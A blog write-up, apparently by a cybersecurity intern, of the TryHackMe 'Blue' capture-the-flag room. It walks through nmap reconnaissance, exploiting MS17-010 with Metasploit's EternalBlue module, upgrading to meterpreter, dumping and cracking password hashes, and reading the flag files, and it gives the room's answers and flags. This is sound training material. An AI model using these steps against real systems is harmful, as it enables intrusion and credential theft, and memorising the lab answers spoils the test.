Call 1 (201) 549-9007 (US) | +91 - 931-062-4042 (WhatsApp) Email: [email protected]
TryHackME-Blue-Writeup

TryHackME – Blue Writeup

In this TryHackME - Blue Writeup we will learn how a small blip in the system can get it hacked. The purpose of this blog is to demonstrate the steps to complete the blue. In this room, deploy & hack into a windows machine, leveraging common misconfigurations issues.

TryHackME - Blue Task 1: Recon

Basically, it’s an info-gathering part in which we need to collect info about open-ports, service-running, os, and their version.

Question 1: How many ports are open with a port number under 1000?

Sol: Step 1: Open ‘nmap’ tool and scan the ip to identify the open ports under 1000.

Nmap

And I found 3-open ports under 1000.

Answer -- 3

Question 2: What is this machine vulnerable to? (Answer in the form of: ms??-???, ex: ms08-067)

Solution: Step 1: Run the vuln script by using Nmap to find the vulnerability.

script by using Nmap
ms17-010

It’s Vulnerable with ‘SMBv1 server ms17-010’.

Answer -- ms17-010

TryHackME - Blue Task 2: Gain Access

This machine is vulnerable to ms17-010 Remote code execution vulnerability. Use Metasploit to exploit it.

Question 1: Find the exploitation code we will run against the machine. What is the full path of the code? (Ex: exploit/........)

Solution :

Step 1: open Metasploit , and try to find the exploitation against ‘SMBv1 server ms17-010’. By using “search ms17-010” command.

search ms17-010” command.

I found this 4-exploit.

Step 2: Now I use the first exploit.

exploit/windows/smb/ms17_010_eternalblue

Answer --exploit/windows/smb/ms17_010_eternalblue

Question 2: Show options and set the one required value. What is the name of this value? (All caps for submission)

Step 1: Check options by using the “show options “ command.

command

Step 2: Set rhosts 10.10.140.190 (Target IP) and press enter.

Set rhosts 10.10.140.190

Answer --rhosts

Now it’s time to run the exploit by using “run” command.

 “run” command.
Set lhost 10.10.112.79

NOTE: If you see a FAIL message to get the session then you need to Set lhost 10.10.112.79 (Your IP) and press enter.

msf6

After setting, the correct lhost and rhosts check again by using the “show options” command to confirm it. Then run again the exploit.

msf6 2
msf6

TryHackME - Blue Task 3: Escalate

After getting in shell, background the shell by using “ctrl+z” command and

Upgrade it to meterpreter.

Question 1: If you haven't already, background the previously gained shell (CTRL + Z). Research online how to convert a shell to meterpreter shell in Metasploit. What is the name of the post-module we will use? (Exact path, similar to the exploit we previously selected)

Solution :

Step 1: use the command “search shell_to”

shell to meterpreter

Step 2: Type command “use 0” to use it.

post/multi/manage/shell_to_meterpreter

Answer --post/multi/manage/shell_to_meterpreter

Question 2: Select this (use MODULE_PATH). Show options, what option are we required to change?

Solution :

Step 1: Type command “Sessions” to check all sessions I have.

Session

Answer --Session

TryHackME - Blue Task 4: Cracking

In this task, we try to get the hash of the user password and crack it.

Question 1: Within our elevated meterpreter shell, run the command 'hashdump'. This will dump all of the passwords on the machine as long as we have the correct privileges to do so. What is the name of the non-default user?

Solution :

Step 1: Now is time to get the shell/cmd by using the “shell” command.

meterpreter shell

Step 2: Now get the hash by using “hashdump” command.

hashdump

The non-default user is only Jon.

Answer -- jon

Question 2: Copy this password hash to a file and research how to crack it. What is the cracked password?

Sol :

Step 1: Now I save jon password hash in a file (jon.txt) and after that rename the file with jon.hash format to decode the hash and get the original password.

Step 2: Decode the hash by using “john tool” and “rockyou.txt” wordlist.

john tool

Answer -- alqfna22

TryHackME - Blue Task 5: Find flags!

When you get the shell successfully then you need to find the flag that is hidden in different directories of the target machine.

Question 1: Flag1? This flag can be found at the system root.

Solution :

Step 1: Check hint and go on ‘c’ drive.

Step 2: Check directories by using “dir” command. Then I see flag1.txt file .

flag1.txt file .

Step 3: Read the flag1.txt file by using “cat” command.

 “cat” command

Flag 1: -- flag{access_the_machine}

Question 2: Flag2? This flag can be found at the location where passwords are stored within Windows.

Solution :

Step 1: Check hint and go on the ‘windows’ folder.

Step 2: Then go to the system32 folder by using the “cd system32” command.

Step 3: Then go to the config file.

Check directory then you see flag2.txt.

Flag 2: -- flag {sam_database_elevated_access}

Question 3: flag3? This flag can be found in an excellent location to loot. After all, Administrators usually have pretty interesting things saved.

Solution :

Type command : Search -f flag*.txt .

After that you see the flag3.txt file, Then read it.

Flag 3: -- flag{admin_documents_can_be_valuable}

Finally done….

NOTE: The eternal blue vulnerability was very famous and many systems were comprised using this vulnerability. Microsoft released a fix to patch up these vulnerabilities for different operating systems.

Author:

Abhishek Sharma.
Cybersecurity Intern.

SHARE

Comments

Leave a Reply

Your email address will not be published.

X